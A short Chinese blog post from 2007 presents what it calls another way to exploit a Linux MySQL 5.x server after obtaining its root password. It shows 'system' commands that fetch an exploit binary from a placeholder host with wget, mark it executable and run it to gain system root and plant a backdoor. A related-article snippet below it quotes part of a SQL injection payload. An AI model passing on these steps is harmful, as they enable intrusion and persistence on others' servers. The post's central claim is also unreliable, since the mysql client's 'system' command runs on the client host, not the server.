linux下mysql 5.x得到root密码后的另外一种利用方式

原创 2007年10月07日 21:50:00
 mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。

    一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。

    按照上面的方法,我们需要知道web的绝对路径,当然这个很不好找,有些有sqlinjection的,可能报错会显示出来,有的就不一定了。但是按照我的的方法,没有必要再去找web路径了,直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;

    直接这样就可以找到web的路径,当然,我们的目的并不是找web路径,放webshell进去。我们是要来做其他的事情,比如,下载exp执行,搞到root权限,然后装后门虾米的

mysql>system wget http://xxxx.xxx.com/xxxx ;

mysql>system chmod +x xxxx;

mysql>system ./xxxx;

     这样mysql的root此时就成为system的root了,剩下的事情,如果开了ssh,就ssh上去,输入mysql的用户密码,ok,搞定。

 
版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

linux下mysql的root密码忘记解决方法

1.首先确认服务器出于安全的状态,也就是没有人能够任意地连接MySQL数据库。 因为在重新设置MySQL的root密码的期间,MySQL数据库完全出于没有密码保护的 状态下,其他的用户也可以任...

Linux下MySQL的root密码忘记解决方法

Linux下MySQL的root密码忘记解决方法 验证环境: [root@localhost ~]# rpm -qa | grep mysql mysql-5.1.71-1.el6.i686...

MySql 5.x注入语句总结

猜字段数, 返回正常说明字段数大于当前值. order by num-- 暴用户:数据库:版本 and 1=2 union select 1,concat(user(),0x3a,d...

windows/linux 命令行方式重置mysql的root密码

windows/linux 命令行方式重置mysql的root密码

MySql 5种子查询方式

 MYSQL子查询的五种形式  mysql从4.1版开始支持子查询功能,在此版本前,可以用join写连表查询来进行替代,但不推荐这么写,相当的麻烦。以下是mysql子查询的几种常见写法:  ...

Pentaho BI Suite配置:在Windows环境下使用MySQL 5.x

Pentaho Business Intelligence Suite配置:在Windows环境下使用MySQL 5.x   Pentaho开发者社区资源: PAT (Pentaho Ana...

MySQL:日期函数、时间函数总结(MySQL 5.X)

原文:http://www.cnblogs.com/she27/archive/2009/01/16/1377089.html 2008年11月18日 15:37 一、MySQL 获得当前日期...

MySQL:日期函数、时间函数总结(MySQL 5.X)

一、MySQL 获得当前日期时间 函数 1.1 获得当前日期+时间(date + time)函数:now() mysql> select now(); +------------------...

MySQL:日期函数、时间函数总结(MySQL 5.X)

一、MySQL 获得当前日期时间 函数 1.1 获得当前日期+时间(date + time)函数:now() mysql> select now(); +------------------...
  • stund
  • stund
  • 2011-02-24 21:02
  • 307

MySQL:日期函数、时间函数总结(MySQL 5.X)

MySQL:日期函数、时间函数总结(MySQL 5.X) [作/译者]:鹏城万里    [日期]:2008-08-09    [来源]:本站原创    [查看]: 2683 【鹏...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)